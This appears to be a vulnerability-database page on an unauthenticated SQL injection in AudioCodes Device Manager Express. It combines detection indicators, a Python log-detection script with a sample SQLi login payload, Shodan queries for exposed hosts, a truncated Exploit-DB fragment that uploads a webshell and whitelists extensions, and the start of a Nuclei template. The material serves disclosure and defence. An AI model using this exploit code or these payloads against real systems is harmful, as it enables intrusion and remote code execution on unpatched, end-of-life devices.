CVE-2022-24627
Published 2023-05-29
Priority: P275 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 26.39% (97.8th percentile)
An issue was discovered in AudioCodes Device Manager Express through 7.8.20002.47752. It is an unauthenticated SQL injection in the p parameter of the process_login.php login form.
Affected
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| audiocodes | device_manager_express | <= 7.8.20002.47752 | — |
Detection & IOCs (extracted from sources)
sigma
words: ['SQL syntax', 'mysql_fetch', 'You have an error in your SQL syntax']
- Detect SQLi exploitation attempts against the login form by monitoring POST requests to /admin/AudioCodes_files/process_login.php with the 'p' parameter containing SQL injection payloads (e.g., URL-encoded quote/OR/comment sequences).
- Alert on HTTP responses from AudioCodes Device Manager containing SQL error strings such as 'SQL syntax', 'mysql_fetch', or 'You have an error in your SQL syntax', which indicate successful SQLi triggering.
- Monitor POST requests to /admin/AudioCodes_files/BrowseFiles.php?cmd=ssh with body containing 'ssh_command=' as an indicator of post-exploitation remote command execution (CVE-2022-24631).
- Monitor POST requests to /admin/AudioCodes_files/ajax/ajaxGlobalSettings.php with action=saveext and a modified extensions list as an indicator of file-upload extension whitelisting for webshell upload.
- Detect webshell upload by monitoring POST requests to the upload endpoint with 'dir' set to 'C:/audiocodes/express/WebAdmin/region/' and file content-type 'text/html'.
- Use Shodan/FOFA queries to identify exposed AudioCodes Device Manager Express instances as attack surface: title:"Audiocodes" or http.title:"audiocodes".
- The exploit targets AudioCodes Device Manager Express version 7.8.20002.47752 specifically; the product was announced EOL on 07-02-2022, meaning no patch will be issued by the vendor.
- The Nuclei template uses a two-step flow: first confirming the target is an AudioCodes instance (body contains 'audiocodes'), then sending the SQLi payload; detections should account for this two-request pattern.
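The request and response indicators above (login-form SQLi, SQL error strings, the ssh_command POST and the saveext POST) can be checked together over proxy or WAF records. The following is an added example, not code from the page's sources; the event record layout, the rule names and the SQLi regex are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Paths are compared in lower case (assumption: the Windows host serves them
# case-insensitively, as the C:/audiocodes upload path suggests).
BASE = "/admin/audiocodes_files/"
SQL_ERRORS = ("SQL syntax", "mysql_fetch", "You have an error in your SQL syntax")
# Assumed heuristic for "quote/OR/comment sequences"; tune it for your traffic.
SQLI_RE = re.compile(r"'\s*(?:or|and|union)\b|'.*(?:--|#|/\*)", re.I | re.S)

def classify(event):
    """Return the names of the rules one HTTP event matches."""
    url = urlsplit(event["url"])
    path, query = url.path.lower(), parse_qs(url.query)
    # parse_qs URL-decodes values, so %27 and + are seen as ' and space.
    form = parse_qs(event.get("req_body", ""), keep_blank_values=True)
    post = event["method"].upper() == "POST"
    hits = []
    if post and path == BASE + "process_login.php":
        if any(SQLI_RE.search(v) for v in form.get("p", [])):
            hits.append("sqli_login_p")
    if any(s in event.get("resp_body", "") for s in SQL_ERRORS):
        hits.append("sql_error_in_response")
    if (post and path == BASE + "browsefiles.php"
            and query.get("cmd") == ["ssh"] and "ssh_command" in form):
        hits.append("ssh_command_post")
    if (post and path == BASE + "ajax/ajaxglobalsettings.php"
            and form.get("action") == ["saveext"]):
        hits.append("extension_list_change")
    return hits

def scan(events):
    """Group matched rule names by source address, in arrival order."""
    by_src = {}
    for event in events:
        for rule in classify(event):
            by_src.setdefault(event["src"], []).append(rule)
    return by_src

# Constructed events; field names other than p, ssh_command and action are made up.
P = "/admin/AudioCodes_files/"
SAMPLE = [
    {"src": "198.51.100.7", "method": "POST", "url": P + "process_login.php", "req_body": "user=admin&p=%27+OR+1%3D1--+", "resp_body": "You have an error in your SQL syntax"},
    {"src": "192.0.2.10", "method": "POST", "url": P + "process_login.php", "req_body": "user=alice&p=Corr3ctHorse", "resp_body": "<html>Welcome</html>"},
    {"src": "198.51.100.7", "method": "POST", "url": P + "BrowseFiles.php?cmd=ssh", "req_body": "ssh_command=PLACEHOLDER", "resp_body": ""},
    {"src": "198.51.100.7", "method": "POST", "url": P + "ajax/ajaxGlobalSettings.php", "req_body": "action=saveext&list=PLACEHOLDER", "resp_body": ""},
]

if __name__ == "__main__":
    for src, rules in scan(SAMPLE).items():
        print(src, rules)
```

Several rules firing for one source in sequence is a stronger signal than any single hit, since a legitimate password can contain a quote or `#`.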
No detection rules found.
Exploit-DB
Device Manager Express 7.8.20002.47752 - Remote Code Execution (RCE)
exploitdb·2023-03-30·CVSS 9.8
CVE-2022-24632 [CRITICAL] Device Manager Express 7.8.20002.47752 - Remote Code Execution (RCE)
---
# Exploit Title: Device Manager Express 7.8.20002.47752 - Remote Code Execution (RCE)
# Date: 02-12-22
# Exploit Author: 0xEF
# Vendor Homepage: https://www.audiocodes.com
# Software Link: https://ln5.sync.com/dl/82774fdd0/jwqwt632-s65tncqu-iwrtm7g3-iidti637
# Version: '
files = {f'myfile': (file, shell, 'text/html')}
body = {'dir': 'C:/audiocodes/express/WebAdmin/region/', 'type': '', 'Submit': 'Upload'}
r = s.post(url, files=files, data=body)
print(f'\nBackdoor location:')
print(f'{Fore.GREEN}(+) http://{target}/region/{file}?{param}=dir{Style.RESET_ALL}')
patch = '2'
time.sleep(1)
patch_ext(s,target,patch,ext)
else:
print(f'{Fore.RED}(-) Could not whitelist extension {ext}.. Try something else\n{Style.RESET_ALL}'
Nuclei
AudioCodes Device Manager Express - SQL Injection
nuclei·CVSS 9.8
CVE-2022-24627 [CRITICAL] AudioCodes Device Manager Express - SQL Injection
Template:
id: CVE-2022-24627
info:
  name: AudioCodes Device Manager Express - SQL Injection
  author: geeknik
  severity: critical
  description: |
    An issue was discovered in AudioCodes Device Manager Express through 7.8.20002.47752. It is an unauthenticated SQL injection in the p parameter of the process_login.php login form.
  impact: |
    Unauthenticated attackers can exploit SQL injection in the login form to bypass authentication, extract sensitive VoIP configuration data, and potentially gain administrative access to the AudioCodes Device Manager system.
  remediatio